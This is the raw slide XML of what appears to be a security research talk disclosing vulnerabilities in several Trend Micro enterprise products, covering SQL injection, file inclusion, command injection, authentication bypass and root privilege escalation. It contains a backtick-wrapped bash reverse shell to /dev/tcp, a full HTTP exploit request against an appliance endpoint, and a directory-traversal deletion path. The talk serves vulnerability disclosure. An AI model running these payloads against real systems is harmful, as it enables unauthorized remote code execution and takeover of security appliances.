            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>files/folders, such as the </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>downloads folder upon </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>filesystem modification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42" y="1905000"/>
            <a:ext cx="6149727" cy="43519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Manager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This is the heart of all Trend Micro products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management console </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>that manages Trend Micro products</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Gateway, Mail server, File server, corporate </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>desktop </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>levels, etc.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>IIS, PHP, ASP and Compiled CGI</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Remote code execution means low privileged access due to IIS default settings</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>How many vulnerabilities in this product?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>41</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>x code execution brought </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>via SQLi</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>14</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>x </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>of which do not require authentication</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>8</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>x </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Information disclosures</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Leveraged information disclosure for authentication bypass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5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Other vulnerabilities had been discovered previously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Where there are a few, there are probably many</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Will present on few SQL injection and an information disclosure one!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564904"/>
            <a:ext cx="87122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14" y="3123952"/>
            <a:ext cx="3733800" cy="1181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ProgressReportCGI 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Unauthenticated, blind SQL Injection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Allows an attacker to steal password hashes</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>No need to crack the hashes, there is a pass the hash vulnerability as well</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Weak database service permissions, only running as NETWORKSERVICE</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Single authentication bypass for the ASP Interface</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Disclosed as </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hu-HU" dirty="0" smtClean="0"/>
              <a:t>ZDI-17-074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9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1988840"/>
            <a:ext cx="5744678" cy="158902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0" y="1988840"/>
            <a:ext cx="5001232" cy="2569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8" y="3933056"/>
            <a:ext cx="5798572" cy="20827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5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ProgressReportCGI SQL Injection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7" y="1772816"/>
            <a:ext cx="11612012" cy="331507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is-IS" b="1" smtClean="0"/>
              <a:t>…</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>n</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>ow that we have a valid session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AdHocQuery_Processor </a:t>
            </a:r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49"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2638028" y="1705098"/>
            <a:ext cx="9097664" cy="2355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3627063"/>
            <a:ext cx="10046208" cy="2743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AdHocQuery_Processor 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two different vulnerabilities allows for unauthenticated remote code execution</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Low privileged code execution, however the local attack surface was not analyzed at the time</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Information disclosure and code execution vulnerabilities also existed in the PHP interface, which could have been combined also</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>It just takes a single authentication bypass and you have several post authenticated SQL-&gt;RCE vulnerabilities to reach</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>This bug was silently patched by Trend Micro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5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modDLPTemplateMatch_drildown File Inclusion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silly bug, simple Local File Inclusion</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>T</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>hree Instances of this vulnerability because the code location was copied three times over in production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Needed a special primitive for modern local file inclusion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3933056"/>
            <a:ext cx="7812360" cy="25084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9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modDLPTemplateMatch_drildown File Inclusion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 authentication needed ! (But low privileged code execution, boo!)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="is-IS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5" r="12116" b="30542"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1164065" y="2492896"/>
            <a:ext cx="9532851" cy="38665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3" y="1841500"/>
            <a:ext cx="9969500" cy="4394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InterScan Web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5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Secure web gateway</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Inspect web traffic against known patterns, anti-malware database, URL reputation and other Trend Micro </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>products</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Apache Tomcat and Struts 2 framework</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Code implemented in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>IWSSGui.jar</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>How many vulnerabilities in this product?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>41</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>x Remote Code Execution vulnerabilities</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>4</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>x do not require authentication</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>x Authentication bypass and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>x Information disclosure</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Previous patch for vulnerabilities found by ZDI failed: </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="bg-BG" dirty="0" smtClean="0"/>
              <a:t>ZDI-16-351</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hu-HU" dirty="0"/>
              <a:t>ZDI-16-350, ZDI-16-349 &amp; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hu-HU" dirty="0" smtClean="0"/>
              <a:t>ZDI-16-348</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>The ability to bypass authentication</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>… and no, its not in the session filter </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>rgod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1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 Bypass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String escapeParam(String strParam)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String afterParam = strParam;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afterParam = afterParam.replace("\"", "\\\"");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afterParam = afterParam.replace("$", "\\$");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afterParam = afterParam.replace("`", "\\`");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afterParam;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 }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Bypass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860" y="1905000"/>
            <a:ext cx="11017224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48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en-US" sz="4800" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="Courier New" charset="0"/>
                <a:cs typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>`</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4800" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="Courier New" charset="0"/>
                <a:cs typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>bash -i </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4800" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="Courier New" charset="0"/>
                <a:cs typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>&gt;&amp; /dev/tcp/&lt;ip&gt;/&lt;port&gt; 0&gt;&amp;1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="48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en-US" sz="4800" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="Courier New" charset="0"/>
                <a:cs typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>`</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="4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" b="3943"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6094413" y="1905000"/>
            <a:ext cx="4098031" cy="2820144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6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Trend Micro </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" i="1" dirty="0" smtClean="0"/>
              <a:t>wants </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>to secure their software</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>They have a bug bounty</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>They have a ton of recently acquired / developed security solutions</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Knowledge is readily available</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Many focusing on desktop Antivirus, not enterprise security solutions</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Huge attack surface running </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>privileged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Finally, we couldn't resist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5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people’s findings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Looks like we missed a few RCE vulnerabilities</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="is-IS" dirty="0" smtClean="0"/>
              <a:t>…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www.korelogic.com/Resources/Advisories/KL-001-2017-003.txt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> (ConfigBackup?action=import)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www.korelogic.com/Resources/Advisories/KL-001-2017-001.txt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>(ConfigBackup?action=upload_check)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Next time, we’ll pay more attention</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Now, lets review a single, critical vulnerability that has been patched!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doPostMountDevice Unauthenticated </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Command Injection </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Vulnerability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25" y="1877688"/>
            <a:ext cx="8672776" cy="44636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doPostMountDevice Unauthenticated Command Injection </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Vulnerability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What is </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>exeUihelperCmd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50" y="1908313"/>
            <a:ext cx="8775662" cy="18475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doPostMountDevice Unauthenticated Command Injection </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Vulnerability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53852" y="1905000"/>
            <a:ext cx="9937104" cy="42672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is-IS" sz="2800" dirty="0" smtClean="0"/>
              <a:t>…and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>w</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>hat is </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0" smtClean="0"/>
              <a:t>exeCmd </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>anyway? Hang on a tick</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="is-IS" sz="2800" dirty="0" smtClean="0"/>
              <a:t>…</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="ctr">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="is-IS" sz="2800" dirty="0" smtClean="0"/>
              <a:t>That‘s an interesting command ‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="is-IS" sz="2800" b="1" dirty="0" smtClean="0"/>
              <a:t>/etc/iscan/AdminUI/uihelper</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="is-IS" sz="2800" dirty="0" smtClean="0"/>
              <a:t>’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78" y="1908313"/>
            <a:ext cx="7837005" cy="18475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2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doPostMountDevice Unauthenticated Command Injection </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Vulnerability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905000"/>
            <a:ext cx="9714108" cy="29238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3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doPostMountDevice Unauthenticated Command Injection </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Vulnerability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1886780"/>
            <a:ext cx="7277844" cy="40937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0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doPostMountDevice Unauthenticated </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Command Injection </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Vulnerability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9836" y="1905000"/>
            <a:ext cx="10369152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POST /rest/commonlog/log_setting/mount_device HTTP/1.1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Host: [host]:1812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Connection: close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Content-Type: application/x-www-form-urlencoded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Content-Length: 77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mount_device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":”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US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`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bash -i &gt;&amp; /dev/tcp/172.16.175.1/1337 0&gt;&amp;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","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cmd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":"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mount"}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4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9836" y="1905000"/>
            <a:ext cx="10369152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Courier New" charset="0"/>
                <a:cs typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>First, they check for a remote request, probably not the best way, since a SSRF can defeat this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2780928"/>
            <a:ext cx="7953669" cy="367212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2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9836" y="1905000"/>
            <a:ext cx="10369152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 smtClean="0">
                <a:ea typeface="Courier New" charset="0"/>
                <a:cs typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>Then, a check to see if the mount_device is valid by calling  isValidMountDevice()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3068960"/>
            <a:ext cx="11080738" cy="26642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9836" y="1905000"/>
            <a:ext cx="10369152" cy="4267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smtClean="0">
                <a:ea typeface="Courier New" charset="0"/>
                <a:cs typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>A string match that</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:ea typeface="Courier New" charset="0"/>
                <a:cs typeface="Courier New" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:ea typeface="Courier New" charset="0"/>
                <a:cs typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>can’t be defeated!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1772816"/>
            <a:ext cx="7449592" cy="47904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“If the security industry is going to promote defense, then they, themselves, should </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="6000" b="1" i="1" dirty="0" smtClean="0"/>
              <a:t>not</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="6000" dirty="0" smtClean="0"/>
              <a:t> be defenseless.”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13" y="1905000"/>
            <a:ext cx="5080000" cy="42672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uihelper Elevation of Privilege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vulnerability pops a root shell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Using the function </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="is-IS" b="1" i="1" dirty="0" smtClean="0"/>
              <a:t>exeUiHelperCmd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="is-IS" dirty="0" smtClean="0"/>
              <a:t> method in Java</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>However, sometimes the injection was in a different sink, and it achieved code execution as the ‘iscan’ user</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>As it turns out, exeUiHelperCmd is just a wrapper around Java’s exec() calling a SUID script that executes a command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We wanted root, so we used the ‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>uihelper.sh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>’ to get root access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uihelper.sh Elevation of Privilege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2070100"/>
            <a:ext cx="9956800" cy="3937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8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772816"/>
            <a:ext cx="8676456" cy="471313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4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061709" y="5692271"/>
            <a:ext cx="18473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844824"/>
            <a:ext cx="11935513" cy="48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Discovery Appliance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 Life (EOL)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8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monitor solution to inspect traffic against signatures/threat intelligence</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>End of Life, no longer a #</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Trend</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Appliance using CentOS with an ancient kernel</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Authentication Bypass via an unauthenticated file delete!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>How many vulnerabilities?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>9</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>x OS Command Injection vulnerabilities in the CGI </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>File upload with zip extraction!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>x Authentication bypasses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Directory </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Traversal Authentication Bypass Vulnerability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the Threat Discovery Appliance, sessionid value is also used as a folder name under /var/log/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/var/log/e8d49ad18d202d671fffcd5e7f37ba8b</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Inside the sessionid folder, a SQLite database is used to check whether the user is authenticated</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Static analysis was required to understand how it was working</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Session management is handled </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>by: /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>opt/TrendMicro/MinoritReport/lib/mini_httpd/utils.so</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>In this library, the logoff mechanism caught our attention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8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Directory </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Traversal Authentication Bypass Vulnerability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638300"/>
            <a:ext cx="10601325" cy="4800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66020" y="3212976"/>
            <a:ext cx="3168352" cy="648072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46540" y="3933056"/>
            <a:ext cx="3240360" cy="144016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Directory </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Traversal Authentication Bypass Vulnerability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1905000"/>
            <a:ext cx="9144000" cy="4267200"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Inside delete_session() function:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>A reference to /var/log/session/%s/%s</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Then following a call to system() with arguments as </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>/bin/rm –rf %s</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>By tracing the %s, we realized that comes from the </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>sessionid cookie parameter provided to the logoff request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604" y="1628800"/>
            <a:ext cx="3523856" cy="5047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56" y="4077072"/>
            <a:ext cx="5481344" cy="25991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472511" y="5733256"/>
            <a:ext cx="2638125" cy="144016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3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 Protection Server</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Data Loss Prevention Manager </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Control Manager</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>InterScan Web Security Virtual Appliance</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Threat Discovery Appliance </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" strike="sngStrike" dirty="0" smtClean="0"/>
              <a:t>Mobile Security for Enterprise</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> (still zero-day)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" strike="sngStrike" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Safe Sync for Enterprise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1772816"/>
            <a:ext cx="2808312" cy="3847387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Directory </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Traversal Authentication Bypass Vulnerability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64" y="1628800"/>
            <a:ext cx="3523856" cy="5047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70" y="2216920"/>
            <a:ext cx="3867150" cy="4438650"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FF0000"/>
          </a:solidFill>
        </p:spPr>
      </p:pic>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="7" name="Straight Arrow Connector 6"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="3214092" y="3284984"/>
            <a:ext cx="3268837" cy="72008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0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Directory Traversal Authentication Bypass Vulnerability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Constraints</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>File needs to actually exist because there is a call to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1" smtClean="0"/>
              <a:t>xstat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>()</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>No special characters allowed to inject commands</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>Only way is to use the delete operation to achieve something</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>Delete and reach default state (where admin password is known)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>../../../../opt/TrendMicro/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1" smtClean="0"/>
              <a:t>MinorityReport</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
